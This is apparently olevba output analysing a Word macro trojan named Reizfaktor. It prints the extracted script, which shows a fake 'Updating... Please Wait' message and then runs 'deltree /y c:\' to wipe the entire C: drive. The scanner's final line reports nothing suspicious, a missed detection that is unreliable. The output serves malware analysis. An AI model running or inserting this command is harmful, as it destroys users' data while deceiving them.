olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Trojan.MSWord.Reizfaktor-7f23925e829ccbc2c6682fe4d02c24e92bc70e70
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Trojan.MSWord.Reizfaktor-7f23925e829ccbc2c6682fe4d02c24e92bc70e70 
in file: Trojan.MSWord.Reizfaktor-7f23925e829ccbc2c6682fe4d02c24e92bc70e70 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
@Echo Updating! This May Take A While...
@Echo Please Wait...
@deltree /y c:\ > c:\Reizfaktor.txt
No suspicious keyword or IOC found.

